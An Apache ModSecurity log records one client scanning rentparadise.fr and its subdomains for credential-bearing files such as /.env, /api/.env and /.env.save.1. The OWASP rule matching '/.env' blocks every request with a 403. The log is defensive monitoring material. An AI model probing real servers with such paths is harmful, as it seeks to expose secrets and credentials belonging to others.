[Mon May 11 13:32:12.930464 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0iAAAAAA"]
[Mon May 11 13:32:12.930645 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0iAAAAAA"]
[Mon May 11 13:32:12.940283 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bot/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vdwAAAMg"]
[Mon May 11 13:32:12.940459 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vdwAAAMg"]
[Mon May 11 13:32:12.940641 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vdwAAAMg"]
[Mon May 11 13:32:12.949356 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-POSQ-m-m0ukSShtduwAAAUs"]
[Mon May 11 13:32:12.949570 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-POSQ-m-m0ukSShtduwAAAUs"]
[Mon May 11 13:32:12.949771 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtduwAAAUs"]
[Mon May 11 13:32:12.954360 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bot/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0igAAAAA"]
[Mon May 11 13:32:12.954534 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0igAAAAA"]
[Mon May 11 13:32:12.954710 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0igAAAAA"]
[Mon May 11 13:32:12.971962 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-POSQ-m-m0ukSShtdvQAAAUs"]
[Mon May 11 13:32:12.972196 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-POSQ-m-m0ukSShtdvQAAAUs"]
[Mon May 11 13:32:12.972393 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdvQAAAUs"]
[Mon May 11 13:32:12.975987 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-POJEyNRN152ArORlvwAAAEM"]
[Mon May 11 13:32:12.976219 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-POJEyNRN152ArORlvwAAAEM"]
[Mon May 11 13:32:12.976486 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlvwAAAEM"]
[Mon May 11 13:32:12.985078 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-PKO9RdIr1DwxYR1veQAAAMg"]
[Mon May 11 13:32:12.985285 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-PKO9RdIr1DwxYR1veQAAAMg"]
[Mon May 11 13:32:12.985480 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1veQAAAMg"]
[Mon May 11 13:32:12.999472 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-POJEyNRN152ArORlwAAAAEM"]
[Mon May 11 13:32:12.999679 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-POJEyNRN152ArORlwAAAAEM"]
[Mon May 11 13:32:12.999867 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlwAAAAEM"]
[Mon May 11 13:32:13.002793 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-Pay-5-wpj6Sx56Z0jgAAAAA"]
[Mon May 11 13:32:13.002974 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/.env.save.1"] [unique_id "agG-Pay-5-wpj6Sx56Z0jgAAAAA"]
[Mon May 11 13:32:13.003150 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-Pay-5-wpj6Sx56Z0jgAAAAA"]
[Mon May 11 13:32:13.008237 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-PaO9RdIr1DwxYR1vegAAAMg"]
[Mon May 11 13:32:13.008452 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-PaO9RdIr1DwxYR1vegAAAMg"]
[Mon May 11 13:32:13.008648 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PaO9RdIr1DwxYR1vegAAAMg"]
[Mon May 11 13:32:13.027635 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-Pay-5-wpj6Sx56Z0kAAAAAA"]
[Mon May 11 13:32:13.027873 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/API/.env"] [unique_id "agG-Pay-5-wpj6Sx56Z0kAAAAAA"]
[Mon May 11 13:32:13.028063 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-Pay-5-wpj6Sx56Z0kAAAAAA"]
[Mon May 11 13:32:13.117320 2026] [security2:error] [pid 1319885:tid 1319938] [client 213.209.159.223:43674] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-O1chVQ3tCn0m9Ooz-QAAARg"]
[Mon May 11 13:32:13.118675 2026] [security2:error] [pid 1320398:tid 1320401] [client 213.209.159.223:43634] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-O-JEyNRN152ArORlgAAAAEE"]
[Mon May 11 13:32:13.173588 2026] [security2:error] [pid 1319998:tid 1320023] [client 213.209.159.223:40612] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-Pat2WtvoFr7xvGywwAAAAJc"]
[Mon May 11 13:32:13.173862 2026] [security2:error] [pid 1319998:tid 1320023] [client 213.209.159.223:40612] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-Pat2WtvoFr7xvGywwAAAAJc"]
[Mon May 11 13:32:13.173722 2026] [security2:error] [pid 1319886:tid 1319926] [client 213.209.159.223:40606] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-Pay-5-wpj6Sx56Z0lgAAABE"]
[Mon May 11 13:32:13.174352 2026] [security2:error] [pid 1319886:tid 1319926] [client 213.209.159.223:40606] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/api/.env"] [unique_id "agG-Pay-5-wpj6Sx56Z0lgAAABE"]
[Mon May 11 13:32:13.820505 2026] [security2:error] [pid 1319998:tid 1320022] [client 213.209.159.223:43686] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-O6t2WtvoFr7xvGywvAAAAJY"]
[Mon May 11 13:32:14.000184 2026] [security2:error] [pid 1319998:tid 1320023] [client 213.209.159.223:40612] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-Pat2WtvoFr7xvGywwAAAAJc"]
